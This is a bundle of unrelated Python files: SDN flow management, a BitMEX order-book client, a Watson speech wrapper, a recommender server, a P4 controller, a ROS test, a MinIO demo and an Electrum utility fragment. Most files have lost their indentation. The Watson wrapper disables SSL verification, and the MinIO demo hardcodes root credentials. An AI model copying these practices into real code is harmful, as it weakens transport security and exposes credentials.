main_cmd = "add-flow -OOpenFlow13"
# first set up ARP requests for the source node, so it will always
# 'find' a partner
cmd = '"in_port=%s' % port_nr
cmd += ',cookie=%s' % cookie
cmd += ',arp'
# only answer for target ip arp requests
cmd += ',arp_tpa=%s' % target_ip
cmd += ',actions='
# set message type to ARP reply
cmd += 'load:0x2->NXM_OF_ARP_OP[]'
# set src ip as dst ip
cmd += ',move:NXM_OF_ETH_SRC[]->NXM_OF_ETH_DST[]'
# set src mac
cmd += ',set_field:%s->eth_src' % target_mac
# set src as target
cmd += ',move:NXM_NX_ARP_SHA[]->NXM_NX_ARP_THA[], move:NXM_OF_ARP_SPA[]->NXM_OF_ARP_TPA[]'
# set target mac as hex
cmd += ',load:0x%s->NXM_NX_ARP_SHA[]' % "".join(target_mac.split(':'))
# set target ip as hex
octets = target_ip.split('.')
dst_ip_hex = '{:02X}{:02X}{:02X}{:02X}'.format(*map(int, octets))
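        # e.g. target_ip "10.0.0.5" -> dst_ip_hex "0A000005" (example value only)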
cmd += ',load:0x%s->NXM_OF_ARP_SPA[]' % dst_ip_hex
# output to incoming port remember the closing "
cmd += ',IN_PORT"'
self.net[switch].dpctl(main_cmd, cmd)
logging.debug(
"Set up ARP reply at %s port %s." % (switch, port_nr))
def delete_flow_by_cookie(self, cookie):
"""
Removes a flow identified by the cookie
:param cookie: The cookie for the specified flow
:type cookie: ``int``
:return: True if successful, else false
:rtype: ``bool``
"""
if not cookie:
return False
logging.debug("Deleting flow by cookie %d" % (cookie))
flows = list()
# we have to call delete-group for each switch
for node in self.net.switches:
flow = dict()
flow["dpid"] = int(node.dpid, 16)
flow["cookie"] = cookie
flow['cookie_mask'] = int('0xffffffffffffffff', 16)
flows.append(flow)
for flow in flows:
logging.debug("Deleting flowentry with cookie %d" % (
flow["cookie"]))
if self.net.controller == RemoteController:
self.net.ryu_REST('stats/flowentry/delete', data=flow)
self.cookies.remove(cookie)
return True
def delete_chain_by_intf(
self, src_vnf_name, src_vnf_intf, dst_vnf_name, dst_vnf_intf):
"""
Removes a flow identified by the vnf_name/vnf_intf pairs
:param src_vnf_name: The vnf name for the specified flow
:type src_vnf_name: ``str``
:param src_vnf_intf: The interface name for the specified flow
:type src_vnf_intf: ``str``
:param dst_vnf_name: The vnf name for the specified flow
:type dst_vnf_name: ``str``
:param dst_vnf_intf: The interface name for the specified flow
:type dst_vnf_intf: ``str``
:return: True if successful, else false
:rtype: ``bool``
"""
logging.debug("Deleting flow for vnf/intf pair %s %s" %
(src_vnf_name, src_vnf_intf))
if not self.check_vnf_intf_pair(src_vnf_name, src_vnf_intf):
return False
if not self.check_vnf_intf_pair(dst_vnf_name, dst_vnf_intf):
return False
target_flow = (src_vnf_name, src_vnf_intf, dst_vnf_name, dst_vnf_intf)
if target_flow not in self.chain_flow_cookies:
return False
success = self.delete_flow_by_cookie(
self.chain_flow_cookies[target_flow])
if success:
del self.chain_flow_cookies[target_flow]
del self.full_chain_data[target_flow]
return True
return False
def delete_loadbalancer(self, vnf_src_name, vnf_src_interface):
'''
Removes a loadbalancer that is configured for the node and interface
        :param vnf_src_name: Name of the source VNF
        :param vnf_src_interface: Name of the source VNF interface
'''
flows = list()
# we have to call delete-group for each switch
delete_group = list()
group_id = self.get_flow_group(vnf_src_name, vnf_src_interface)
for node in self.net.switches:
for cookie in self.lb_flow_cookies[(
vnf_src_name, vnf_src_interface)]:
flow = dict()
flow["dpid"] = int(node.dpid, 16)
flow["cookie"] = cookie
flow['cookie_mask'] = int('0xffffffffffffffff', 16)
flows.append(flow)
group_del = dict()
group_del["dpid"] = int(node.dpid, 16)
group_del["group_id"] = group_id
delete_group.append(group_del)
for flow in flows:
logging.debug("Deleting flowentry with cookie %d belonging to lb at %s:%s" % (
flow["cookie"], vnf_src_name, vnf_src_interface))
if self.net.controller == RemoteController:
self.net.ryu_REST('stats/flowentry/delete', data=flow)
logging.debug("Deleting group with id %s" % group_id)
for switch_del_group in delete_group:
if self.net.controller == RemoteController:
self.net.ryu_REST("stats/groupentry/delete",
data=switch_del_group)
# unmap groupid from the interface
target_pair = (vnf_src_name, vnf_src_interface)
if target_pair in self.flow_groups:
del self.flow_groups[target_pair]
if target_pair in self.full_lb_data:
del self.full_lb_data[target_pair]
def delete_floating_lb(self, cookie):
"""
Delete a floating loadbalancer.
Floating loadbalancers are different from normal ones as there are multiple ones on the same interface.
:param cookie: The cookie of the loadbalancer
:type cookie: ``int``
"""
cookie = int(cookie)
if cookie not in self.floating_cookies:
raise Exception(
"Can not delete floating loadbalancer as the flowcookie is not known")
self.delete_flow_by_cookie(cookie)
floating_ip = self.floating_cookies[cookie]
self.floating_network.withdraw_ip_address(floating_ip)
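    # Lifecycle sketch (datacenter name and lb_data are illustrative, `api` stands for an instance of this class):
    #   cookie, floating_ip = api.add_floating_lb("dc1", lb_data)
    #   ... traffic sent to floating_ip is now balanced over the configured VNF interfaces ...
    #   api.delete_floating_lb(cookie)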
def set_arp_entry(self, vnf_name, vnf_interface, ip, mac):
"""
Sets an arp entry on the specified VNF. This is done on the node directly and not by open vswitch!
:param vnf_name: Name of the VNF
:type vnf_name: ``str``
:param vnf_interface: Name of the interface
:type vnf_interface: ``str``
:param ip: IP to reply to
:type ip: ``str``
:param mac: Answer with this MAC
:type mac: ``str``
"""
node = self.net.getNodeByName(vnf_name)
node.cmd("arp -i %s -s %s %s" % (vnf_interface, ip, mac))
|
webserver.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I'm alive"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
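# Usage sketch (assumes this module is importable as `webserver` from the main script):
#   from webserver import keep_alive
#   keep_alive()  # serves "I'm alive" on 0.0.0.0:8080 from a background thread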
|
bitmex_book.py
|
# -*- coding: utf-8 -*-
# - OrderBook Websocket Thread -
# 🦏 **** quan.digital **** 🦏
# authors: canokaue & thomgabriel
# date: 03/2020
# kaue.cano@quan.digital
# Simplified implementation of connecting to BitMEX websocket for streaming realtime orderbook data.
# Optimized for OrderBookL2 handling using red-black binary search trees - https://www.programiz.com/dsa/red-black-tree
# Originally developed for Quan Digital's Whale Watcher project - https://github.com/quan-digital/whale-watcher
# Code based on stock Bitmex API connectors - https://github.com/BitMEX/api-connectors/tree/master/official-ws/python/bitmex_websocket.py
# As well as pmaji's GDAX OrderBook thread - https://github.com/pmaji/crypto-whale-watching-app/blob/master/gdax_book.py
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Docs: https://www.bitmex.com/app/wsAPI
import websocket
import threading
import traceback
from time import sleep
import json
import logging
import urllib
from decimal import Decimal
from bintrees import RBTree
from operator import itemgetter
from tqdm import tqdm
# Websocket timeout in seconds
CONN_TIMEOUT = 5
# It's recommended not to grow a table larger than 200. Helps cap memory usage.
MAX_TABLE_LEN = 200
class BitMEXBook:
def __init__(self, endpoint="https://www.bitmex.com/api/v1", symbol='XBTUSD'):
'''Connect to the websocket and initialize data stores.'''
self.logger = logging.getLogger(__name__)
self.logger.debug("Initializing WebSocket.")
self.endpoint = endpoint
self.symbol = symbol
self.data = {}
self.keys = {}
self.exited = False
self._asks = RBTree()
self._bids = RBTree()
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
wsURL = self.__get_url()
self.logger.debug("Connecting to %s" % wsURL)
self.__connect(wsURL, symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
self.logger.info('Got all market data. Starting.')
def init(self):
self.logger.debug("Initializing WebSocket...")
self.data = {}
self.keys = {}
self.exited = False
wsURL = self.__get_url()
self.logger.debug("Connecting to URL -- %s" % wsURL)
self.__connect(wsURL, self.symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(self.symbol)
self.logger.info('Got all market data. Starting.')
def error(self, err):
self._error = err
self.logger.error(err)
#self.exit()
def __del__(self):
self.exit()
def reset(self):
self.logger.warning('Websocket resetting...')
self.ws.close()
        self.logger.info('Websocket closed.')
self.logger.info('Restarting...')
self.init()
def exit(self):
'''Call this to exit - will close websocket.'''
self.exited = True
self.ws.close()
### Main orderbook function
def get_current_book(self):
result = {
'asks': [],
'bids': []
}
for ask in self._asks:
try:
# There can be a race condition here, where a price point is removed
# between these two ops
this_ask = self._asks[ask]
except KeyError:
continue
for order in this_ask:
result['asks'].append([order['price'], order['size'], order['id']]) #(order['size']/Decimal(order['price']))
# Same procedure for bids
for bid in self._bids:
try:
this_bid = self._bids[bid]
except KeyError:
continue
for order in this_bid:
result['bids'].append([order['price'], order['size'], order['id']]) #(order['size']/Decimal(order['price']))
return result
# -----------------------------------------------------------------------------------------
# ----------------------RBTrees Handling---------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
# Get current minimum ask price from tree
def get_ask(self):
return self._asks.min_key()
# Get ask given id
def get_asks(self, id):
return self._asks.get(id)
    # Remove ask from tree
def remove_asks(self, id):
self._asks.remove(id)
# Insert ask into tree
def set_asks(self, id, asks):
self._asks.insert(id, asks)
# Get current maximum bid price from tree
def get_bid(self):
return self._bids.max_key()
# Get bid given id
def get_bids(self, id):
return self._bids.get(id)
    # Remove bid from tree
def remove_bids(self, id):
self._bids.remove(id)
# Insert bid into tree
def set_bids(self, id, bids):
self._bids.insert(id, bids)
    # Add order to our watched orders
def add(self, order):
order = {
'id': order['id'], # Order id data
'side': order['side'], # Order side data
'size': Decimal(order['size']), # Order size data
'price': order['price'] # Order price data
}
if order['side'] == 'Buy':
bids = self.get_bids(order['id'])
if bids is None:
bids = [order]
else:
bids.append(order)
self.set_bids(order['id'], bids)
else:
asks = self.get_asks(order['id'])
if asks is None:
asks = [order]
else:
asks.append(order)
self.set_asks(order['id'], asks)
# Order is done, remove it from watched orders
def remove(self, order):
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is not None:
bids = [o for o in bids if o['id'] != order['id']]
if len(bids) > 0:
self.set_bids(oid, bids)
else:
self.remove_bids(oid)
else:
asks = self.get_asks(oid)
if asks is not None:
asks = [o for o in asks if o['id'] != order['id']]
if len(asks) > 0:
self.set_asks(oid, asks)
else:
self.remove_asks(oid)
# Updating order price and size
def change(self, order):
new_size = Decimal(order['size'])
# Bitmex updates don't come with price, so we use the id to match it instead
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is None or not any(o['id'] == order['id'] for o in bids):
return
index = list(map(itemgetter('id'), bids)).index(order['id'])
bids[index]['size'] = new_size
self.set_bids(oid, bids)
else:
asks = self.get_asks(oid)
if asks is None or not any(o['id'] == order['id'] for o in asks):
return
index = list(map(itemgetter('id'), asks)).index(order['id'])
asks[index]['size'] = new_size
self.set_asks(oid, asks)
# -----------------------------------------------------------------------------------------
# ----------------------WS Private Methods-------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
def __connect(self, wsURL, symbol):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = CONN_TIMEOUT
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to WS! Exiting.")
# self.exit()
# raise websocket.WebSocketTimeoutException('Couldn\'t connect to WS! Exiting.')
self.reset()
def __get_url(self):
'''
Generate a connection URL. We can define subscriptions right in the querystring.
Most subscription topics are scoped by the symbol we're listening to.
'''
symbolSubs = ["orderBookL2"]
subscriptions = [sub + ':' + self.symbol for sub in symbolSubs]
urlParts = list(urllib.parse.urlparse(self.endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe={}".format(','.join(subscriptions))
return urllib.parse.urlunparse(urlParts)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
pbar = tqdm(total=160)
# Wait until data reaches our RBTrees
while self._asks.is_empty() and self._bids.is_empty():
sleep(0.1)
pbar.update(3)
pbar.close()
def __send_command(self, command, args=None):
'''Send a raw command.'''
if args is None:
args = []
self.ws.send(json.dumps({"op": command, "args": args}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
# self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
# table = message.get("table")
# action = message.get("action")
try:
# RBTrees for orderBook
if table == 'orderBookL2':
# For every order received
try:
for order in message['data']:
if action == 'partial':
self.logger.debug('%s: adding partial %s' % (table, order))
self.add(order)
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, order))
self.add(order)
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, order))
self.change(order)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, order))
self.remove(order)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error('Error handling RBTrees: %s' % traceback.format_exc())
# Uncomment this to watch RBTrees evolution in real time
# self.logger.info('==============================================================')
# self.logger.info('=============================ASKS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._asks)
# self.logger.info('==============================================================')
# self.logger.info('=============================BIDS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._bids)
except:
self.logger.error(traceback.format_exc())
def __on_error(self, error):
'''Called on fatal websocket errors. We exit on these.'''
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
def __on_open(self):
'''Called when the WS opens.'''
self.logger.debug("Websocket Opened.")
def __on_close(self):
'''Called on websocket close.'''
self.logger.info('Websocket Closed')
# Utility method for finding an item in the store.
# When an update comes through on the websocket, we need to figure out which item in the array it is
# in order to match that item.
# Helpfully, on a data push (or on an HTTP hit to /api/v1/schema), we have a "keys" array. These are the
# fields we can use to uniquely identify an item. Sometimes there is more than one, so we iterate through
# all provided keys.
def find_by_keys(keys, table, matchData):
for item in table:
if all(item[k] == matchData[k] for k in keys):
return item
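# Minimal usage sketch (not part of the original module): connect to the public
# BitMEX endpoint and periodically log the size of the tracked book.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    book = BitMEXBook(symbol='XBTUSD')
    try:
        while not book.exited:
            snapshot = book.get_current_book()
            logging.info("book levels: %d bids / %d asks",
                         len(snapshot['bids']), len(snapshot['asks']))
            sleep(5)
    except KeyboardInterrupt:
        book.exit()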
|
watsonspeechapi.py
|
# -*- coding: utf-8 -*-
"""
https://github.com/watson-developer-cloud/python-sdk/blob/master/examples/microphone-speech-to-text.py
"""
import io
import threading
import queue
from watson_developer_cloud import SpeechToTextV1
from watson_developer_cloud.websocket import RecognizeCallback, AudioSource
import numpy as np
from logzero import logger
import model.key
cont_type = "audio/wav"
lang = "ja-JP_BroadbandModel"
def TranscodeFromFile(path, sample_rate):
try:
with io.open(path, 'rb') as audio_file:
# watson connection
stt = SpeechToTextV1(
iam_apikey=model.key.WATSON_APIKEY, url=model.key.WATSON_URL)
response = stt.recognize(
audio=audio_file, content_type=cont_type, model=lang)
result_json = response.result
for i in range(len(result_json["results"])):
logger.debug(
result_json["results"][i]["alternatives"][0]["transcript"])
return result_json["results"][0]["alternatives"][0]["transcript"]
except:
return ""
# define callback for the speech to text service
class MyRecognizeCallback(RecognizeCallback):
def __init__(self, parent):
RecognizeCallback.__init__(self)
self._parent = parent
def on_transcription(self, transcript):
logger.debug(f'on_transcription:{transcript}')
self._parent.write_result(transcript[0]["transcript"])
def on_connected(self):
logger.debug('on_connected:Connection was successful')
def on_error(self, error):
logger.error(f'on_error:{error}')
def on_inactivity_timeout(self, error):
logger.debug(f'on_inactivity_timeout:{error}')
def on_listening(self):
logger.debug('on_listening:Service is listening')
def on_hypothesis(self, hypothesis):
logger.debug(f'on_hypothesis:{hypothesis}')
self._parent.write_result(hypothesis)
def on_data(self, data):
logger.debug(f'on_data:{data}')
def on_close(self):
logger.debug("on_close:Connection closed")
class Transcoder:
def __init__(self):
logger.info('__init__:Enter')
self._token = None
self.transcript = None
self._queue = queue.Queue()
self._stt = SpeechToTextV1(
iam_apikey=model.key.WATSON_APIKEY, url=model.key.WATSON_URL)
self._audio_source = AudioSource(self._queue, True, True)
        # As of 2019/04/14 the certificate on the WebSocket endpoint is treated as invalid, so disable SSL verification below
self._stt.disable_SSL_verification()
def start(self, token):
"""Start up streaming speech call"""
logger.info('start:Enter')
self._token = token
threading.Thread(target=self.process).start()
    def write_result(self, transcript):
        self.transcript = transcript
def write_stream(self, buf):
if(buf is None):
self._queue.put(buf)
else:
arr = (buf * 32767).astype(np.int16)
arr_bytes = arr.tobytes('C')
self._queue.put(arr_bytes)
def process(self):
logger.info('process:Enter')
mycallback = MyRecognizeCallback(self)
logger.info('start transcode')
self._stt.recognize_using_websocket(
audio=self._audio_source,
content_type='audio/l16; rate=16000',
recognize_callback=mycallback,
interim_results=True,
model=lang)
logger.info('end transcode')
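# Usage sketch (not part of the original module): feed one second of silence and read
# back whatever hypothesis the service produced. Assumes valid Watson credentials in
# model.key and 16 kHz mono float audio in the range [-1, 1].
if __name__ == '__main__':
    import time
    transcoder = Transcoder()
    transcoder.start(token=None)  # the token is stored but not used for authentication here
    silence = np.zeros(16000, dtype=np.float32)  # one second of 16 kHz silence
    transcoder.write_stream(silence)
    time.sleep(5)
    transcoder.write_stream(None)  # None is forwarded to the audio queue as-is
    logger.info(f'transcript: {transcoder.transcript}')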
|
server.py
|
from .recommender import Recommender
from daemon import Daemon, Socket
from threading import Thread
from queue import Queue
import os, time
def lazyprop(fn):
attr_name = '_lazy_' + fn.__name__
@property
def _lazyprop(self):
if not hasattr(self, attr_name):
setattr(self, attr_name, fn(self))
return getattr(self, attr_name)
return _lazyprop
class Server():
def __init__(
self,
host,
port,
logfile,
pidfile,
queue_limit,
documents_n,
persons_n,
recs_limit,
invalidate_after):
self.host = host
self.port = port
self.logfile = logfile
self.pidfile = pidfile
self.queue_limit = queue_limit
self.documents_n = documents_n
self.persons_n = persons_n
self.recs_limit = recs_limit
self.invalidate_after = invalidate_after
self.chkdir(logfile)
self.chkdir(pidfile)
self.logfile_fh = open(logfile, 'a')
@lazyprop
def daemon(self):
return Daemon(self.pidfile, self.onstart)
@lazyprop
def socket(self):
return Socket(self.host, self.port, self.dispatch)
@lazyprop
def queue(self):
return Queue()
@lazyprop
def recommender(self):
return Recommender(
self.documents_n,
self.persons_n,
self.invalidate_after,
self.recs_limit)
def chkdir(self, sfile):
sdir = os.path.dirname(sfile)
if not os.path.isdir(sdir):
os.makedirs(sdir)
def command(self, cmd):
return self.daemon.command(cmd)
def onstart(self):
self.thread = Thread(target=self.dispatcher)
self.thread.start()
self.socket.listen()
self.recommender # init
def dispatch(self, message):
if self.queue.qsize() >= self.queue_limit:
message.response(self._pack_response('QFULL'))
else:
self.queue.put(message)
def dispatcher(self):
while True:
message = self.queue.get()
try:
method, did, pid = message.data.decode('ascii').split(',')
if method == 'RECR':
self.recommender.record(did, pid)
elif method == 'RECM':
recs = self.recommender.recommend(did, pid)
message.response(self._pack_response('OK', recs))
elif method == 'RR':
self.recommender.record(did, pid)
recs = self.recommender.recommend(did, pid)
message.response(self._pack_response('OK', recs))
elif method == 'PH':
dids = self.recommender.person_history(pid)
message.response(self._pack_response('OK', dids))
else:
raise Exception
except:
message.response(self._pack_response('BADMSG'))
self.queue.task_done()
def _pack_response(self, status, data = []):
return bytes(','.join([status] + data), 'ascii')
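# Wire-protocol sketch (framing and transport live in daemon.Socket; values illustrative):
#   request : ASCII "METHOD,document_id,person_id", e.g. b"RECM,doc42,person7"
#   methods : RECR (record only), RECM (recommend), RR (record + recommend),
#             PH (person history)
#   reply   : b"OK,<id1>,<id2>,..." for RECM/RR/PH, b"BADMSG" for malformed requests,
#             b"QFULL" when the work queue has reached queue_limit (RECR sends no reply).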
|
switch_controller.py
|
import binascii
import threading
import simplejson as json
import struct
import p4runtime_lib.bmv2
import p4runtime_lib.helper
class BaseController:
def __init__(self, p4info_file_path, bmv2_file_path):
self.switches = {}
self.port_queues = {}
self.port_threads = {}
self.p4info_helper = p4runtime_lib.helper.P4InfoHelper(p4info_file_path)
self.p4info_file_path = p4info_file_path
self.bmv2_file_path = bmv2_file_path
self.packet_in_threads = []
self.application_mapping = {}
def add_switch_connection(self, name, address, device_id, type='bmv2',
crypto_address=None, debug=False, notification_socket=None,
num_ports=15):
sw = p4runtime_lib.bmv2.Bmv2SwitchConnection(name=name, address=address, device_id=device_id, debug=debug)
self.switches[sw.name] = {"connection": sw, "usable_register_index": set(range(1024))}
def startup(self):
for switch_name, switch_data in self.switches.items():
switch_data["connection"].SetForwardingPipelineConfig(p4info=self.p4info_helper.p4info,
bmv2_json_file_path=self.bmv2_file_path)
t = threading.Thread(target=switch_data["connection"].send_init_and_wait, args=(self.response_callback,))
t.start()
self.packet_in_threads.append(t)
def teardown(self):
for switch_name, switch_data in self.switches.items():
switch_data["connection"].stop_waiting()
for t in self.packet_in_threads:
t.join()
def register_application(self, application, packet_in_codes):
for code in packet_in_codes:
self.application_mapping[code] = application
def install_table_entries_from_json(self, configuration_file_path):
with open(configuration_file_path, 'r') as f:
table_entries = json.load(f)
for switch_name, table_entries in table_entries.items():
for entry in table_entries:
table_entry = self.p4info_helper.buildTableEntry(
table_name=entry['table'],
match_fields=entry['match'],
action_name=entry['action_name'],
action_params=entry['action_params'])
self.switches[switch_name]["connection"].WriteTableEntry(table_entry)
print("[+] Successfully installed table entries from " + configuration_file_path + " on " + switch_name)
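    # The configuration file read above is expected to map switch names to table
    # entries, e.g. (switch, table and action names are illustrative):
    # {
    #   "s1": [
    #     {"table": "MyIngress.ipv4_lpm",
    #      "match": {"hdr.ipv4.dstAddr": ["10.0.1.1", 32]},
    #      "action_name": "MyIngress.ipv4_forward",
    #      "action_params": {"dstAddr": "08:00:00:00:01:11", "port": 1}}
    #   ]
    # }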
def build_and_install_table_entry(self, switch_name, entry):
table_entry = self.p4info_helper.buildTableEntry(
table_name=entry['table_name'],
match_fields=entry['match_fields'],
action_name=entry['action_name'],
action_params=entry['action_params']
)
self.switches[switch_name]["connection"].WriteTableEntry(table_entry)
def response_callback(self, switch, response):
if response.packet.payload:
# Parse CPU packet
reason = struct.unpack(">H", response.packet.payload[8:10])[0]
ingress_port = struct.unpack(">H", response.packet.payload[10:12])[0]
            timestamp = int(binascii.hexlify(response.packet.payload[12:18]).decode(), 16)
# Delegate to registered handler
if reason in self.application_mapping:
self.application_mapping[reason].packet_in(reason, response.packet.payload)
else:
print("[!] No registered handler for this CPU packet reason.")
|
test_buffer_client.py
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import threading
import time
import unittest
import rclpy
from tf2_ros.buffer_client import BufferClient
from geometry_msgs.msg import TransformStamped
from tf2_msgs.action import LookupTransform
from tf2_py import BufferCore, LookupException
from rclpy.executors import SingleThreadedExecutor
from tf2_msgs.msg import TF2Error
def build_transform(target_frame, source_frame, stamp):
transform = TransformStamped()
transform.header.frame_id = target_frame
transform.header.stamp = stamp
transform.child_frame_id = source_frame
transform.transform.translation.x = 42.0
transform.transform.translation.y = -3.14
transform.transform.translation.z = 0.0
transform.transform.rotation.w = 1.0
transform.transform.rotation.x = 0.0
transform.transform.rotation.y = 0.0
transform.transform.rotation.z = 0.0
return transform
class MockBufferServer():
def __init__(self, node, buffer_core):
self.action_server = rclpy.action.ActionServer(node, LookupTransform, 'lookup_transform', self.execute_callback)
self.node = node
self.buffer_core = buffer_core
self.result_buffer = {}
def execute_callback(self, goal_handle):
response = LookupTransform.Result()
response.transform = TransformStamped()
response.error = TF2Error()
try:
if not goal_handle.request.advanced:
transform = self.buffer_core.lookup_transform_core(target_frame=goal_handle.request.target_frame,
source_frame=goal_handle.request.source_frame,
time=goal_handle.request.source_time)
else:
transform = self.buffer_core.lookup_transform_full_core(
target_frame=goal_handle.request.target_frame,
source_frame=goal_handle.request.source_frame,
source_time=goal_handle.request.source_time,
target_time=goal_handle.request.target_time,
fixed_frame=goal_handle.request.fixed_frame
)
response.transform = transform
except LookupException as e:
response.error.error = TF2Error.LOOKUP_ERROR
return response
class TestBufferClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.context = rclpy.context.Context()
rclpy.init(context=cls.context)
cls.executor = SingleThreadedExecutor(context=cls.context)
cls.node = rclpy.create_node('TestBufferClient', context=cls.context)
cls.executor.add_node(cls.node)
buffer_core = BufferCore()
transform = build_transform('foo', 'bar', rclpy.time.Time().to_msg())
buffer_core.set_transform(transform, 'unittest')
cls.mock_action_server = MockBufferServer(cls.node, buffer_core)
@classmethod
def tearDownClass(cls):
cls.node.destroy_node()
rclpy.shutdown(context=cls.context)
def setUp(self):
self.spinning = threading.Event()
self.spin_thread = threading.Thread(target=self.spin)
self.spin_thread.start()
def tearDown(self):
self.spinning.set()
self.spin_thread.join()
def spin(self):
while self.context.ok() and not self.spinning.is_set():
self.executor.spin_once(timeout_sec=0.05)
def test_lookup_transform_true(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
result = buffer_client.lookup_transform(
'foo', 'bar', rclpy.time.Time().to_msg(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(build_transform(
'foo', 'bar', rclpy.time.Time().to_msg()), result)
def test_lookup_transform_fail(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
with self.assertRaises(LookupException) as ex:
result = buffer_client.lookup_transform(
'bar', 'baz', rclpy.time.Time().to_msg(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(LookupException, type(ex.exception))
if __name__ == '__main__':
unittest.main()
|
demo_minio.py
|
import threading
import os
import time
import subprocess
# export MINIO_ROOT_USER=minio_credential MINIO_ROOT_PASSWORD=minio_credential
os.putenv("MINIO_ROOT_USER", "minio_credential")
os.putenv("MINIO_ROOT_PASSWORD", "minio_credential")
def start_minio():
os.system('minio server --console-address ":9001" /Users/zheng/Desktop/minio_data')
def stop_minio():
print("add alias")
subprocess.run(
"mc alias set myminio http://localhost:9000 minio_credential minio_credential", shell=True
)
print("shutting")
subprocess.run("mc admin service stop myminio", shell=True)
print("finished")
x = threading.Thread(target=start_minio, daemon=True)
x.start()
i = 0
while i < 5:
time.sleep(5)
print(i)
i += 1
stop_minio()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import requests
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
is_bundle = getattr(sys, 'frozen', False)
is_macOS = sys.platform == 'darwin'
base_units = {'ZCL':8, 'mZCL':5, 'uZCL':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
